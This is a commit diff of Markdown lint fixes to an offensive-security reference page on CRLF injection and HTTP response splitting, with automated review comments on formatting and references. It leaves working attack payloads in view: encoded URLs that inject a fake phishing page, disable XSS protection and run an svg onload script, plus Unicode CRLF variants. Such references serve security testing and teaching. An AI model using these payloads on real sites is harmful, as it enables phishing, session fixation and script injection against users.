Markdown Linting - CORS, CRLF, CSPT, CSRF, Command Injection

This commit is contained in:
Swissky
2025-03-24 16:52:42 +01:00
parent 9465e12b76
commit e6eb436eb1
5 changed files with 101 additions and 131 deletions


@@ -12,7 +12,6 @@
* [Labs](#labs)
* [References](#references)
## Methodology
HTTP Response Splitting is a security vulnerability where an attacker manipulates an HTTP response by injecting Carriage Return (CR) and Line Feed (LF) characters (collectively called CRLF) into a response header. These characters mark the end of a header and the start of a new line in HTTP responses.
@@ -28,7 +27,6 @@ By injecting a CRLF sequence, the attacker can break the response into two parts
* Cache Poisoning: Forcing incorrect content to be stored in caches.
* Header Manipulation: Altering headers to mislead users or systems
### Session Fixation
A typical HTTP response header looks like this:
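Review bot: the two bullets left as context in this hunk end inconsistently: "Cache Poisoning: Forcing incorrect content to be stored in caches." has a terminal period while "Header Manipulation: Altering headers to mislead users or systems" has none; since this is a lint pass, either add the period to the second item or drop it from the first so the list is uniform.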
@@ -50,18 +48,17 @@ Set-Cookie: admin=true
Now the attacker has set their own cookie.
### Cross Site Scripting
Beside the session fixation that requires a very insecure way of handling user session, the easiest way to exploit a CRLF injection is to write a new body for the page. It can be used to create a phishing page or to trigger an arbitrary Javascript code (XSS).
**Requested page**
**Requested page**:
```http
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
```
**HTTP response**
**HTTP response**:
```http
Set-Cookie:en
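Review bot: the label change to `**Requested page**:` / `**HTTP response**:` is consistent with the colon style used elsewhere, but the unchanged context sentence above it ("Beside the session fixation that requires a very insecure way of handling user session") is ungrammatical; while this block is being touched, suggest "Besides session fixation, which requires a very insecure way of handling user sessions, the easiest way ..." and "JavaScript" rather than "Javascript".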
@@ -77,13 +74,13 @@ Content-Length: 34
In the case of an XSS, the CRLF injection allows to inject the `X-XSS-Protection` header with the value value "0", to disable it. And then we can add our HTML tag containing Javascript code .
**Requested page**:
```powershell
http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
```
**HTTP Response**:
```http
HTTP/1.1 200 OK
Date: Tue, 20 Dec 2016 14:34:03 GMT
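Review bot: the `**Requested page**:` block here is fenced as ```powershell although its content is a single URL, while the equivalent block in the previous section is fenced as ```http; use the same tag (`http`, or no language) so the two examples render alike. The context sentence above it also carries a doubled word ("with the value value \"0\"") and a stray space before the final period ("Javascript code ."); both are worth fixing in the same lint commit.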
@@ -97,7 +94,7 @@ ETag: "842fe-597b-54415a5c97a80"
X-UA-Compatible: IE=edge
Server: NetDNA-cache/2.2
Link: https://example.com/[INJECTION STARTS HERE]
Content-Length:35
Content-Length:35
X-XSS-Protection:0
```
@@ -114,10 +111,9 @@ Inject a `Location` header to force a redirect for the user.
[RFC 7230](https://datatracker.ietf.org/doc/html/rfc7230#section-3.2.4) states that most HTTP header field values use only a subset of the US-ASCII charset.
> Newly defined header fields SHOULD limit their field values to US-ASCII octets.
Firefox followed the spec by stripping off any out-of-range characters when setting cookies instead of encoding them.
Firefox followed the spec by stripping off any out-of-range characters when setting cookies instead of encoding them.
| UTF-8 Character | Hex | Unicode | Stripped |
| --------- | --- | ------- | -------- |
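Review bot: the two `Firefox followed the spec ...` lines in this hunk are identical in content, so the change is presumably trailing whitespace only, which is fine for a lint pass. Separately, the sentence above cites RFC 7230 for the US-ASCII field-value guidance; RFC 7230 has since been obsoleted by RFC 9110 / RFC 9112, so consider pointing the link at the current document (the quoted "SHOULD limit their field values to US-ASCII octets" wording is preserved there).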
@@ -132,7 +128,6 @@ Firefox followed the spec by stripping off any out-of-range characters when sett
```js
嘊嘍content-type:text/html嘊嘍location:嘊嘍嘊嘍嘼svg/onload=alert(document.domain()
嘊嘍content-type:text/html嘊嘍location:嘊嘍嘊嘍嘼svg/onload=alert(document.domain()
```
URL encoded version
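Review bot: the fence around the Unicode payload is tagged ```js, but the content is raw header text (`content-type:text/html`, `location:`), not JavaScript, so the tag only produces misleading highlighting; suggest ```http or an untagged fence as used for the other response samples. The trailing line "URL encoded version" is also the only section label in this file that is neither bold nor followed by a colon; `**URL encoded version**:` would match the `**Requested page**:` / `**HTTP response**:` convention adopted in this same commit.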
@@ -145,15 +140,13 @@ URL encoded version
* [PortSwigger - HTTP/2 request splitting via CRLF injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)
* [Root Me - CRLF](https://www.root-me.org/en/Challenges/Web-Server/CRLF)
* [Root Me - CRLF](https://www.root-me.org/en/Challenges/Web-Server/CRLF)
## References
* [CRLF Injection - CWE-93 - OWASP - May 20, 2022](https://www.owasp.org/index.php/CRLF_Injection)
* [CRLF injection on Twitter or why blacklists fail - XSS Jigsaw - April 21, 2015](https://web.archive.org/web/20150425024348/https://blog.innerht.ml/twitter-crlf-injection/)
- [CRLF injection on Twitter or why blacklists fail - XSS Jigsaw - April 21, 2015](https://web.archive.org/web/20150425024348/https://blog.innerht.ml/twitter-crlf-injection/)
* [Starbucks: [newscdn.starbucks.com] CRLF Injection, XSS - Bobrov - December 20, 2016](https://vulners.com/hackerone/H1:192749)
- [CRLF Injection - CWE-93 - OWASP - May 20, 2022](https://www.owasp.org/index.php/CRLF_Injection)
- [CRLF injection on Twitter or why blacklists fail - XSS Jigsaw - April 21, 2015](https://web.archive.org/web/20150425024348/https://blog.innerht.ml/twitter-crlf-injection/)
- [Starbucks: [newscdn.starbucks.com] CRLF Injection, XSS - Bobrov - December 20, 2016](https://vulners.com/hackerone/H1:192749)
* [CRLF Injection - CWE-93 - OWASP - May 20, 2022](https://www.owasp.org/index.php/CRLF_Injection)
* [CRLF injection on Twitter or why blacklists fail - XSS Jigsaw - April 21, 2015](https://web.archive.org/web/20150425024348/https://blog.innerht.ml/twitter-crlf-injection/)
* [Starbucks: [newscdn.starbucks.com] CRLF Injection, XSS - Bobrov - December 20, 2016](https://vulners.com/hackerone/H1:192749)
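Review bot: this hunk shows the three References entries (OWASP CWE-93, XSS Jigsaw, Starbucks/Bobrov) appearing with both `*` and `-` list markers, and the Root Me lab entry appears twice; please confirm the resulting file keeps exactly one copy of each entry and that the whole list uses the `*` marker already used for the Labs list above, since mixed markers are what the linter (MD004) flags in the first place.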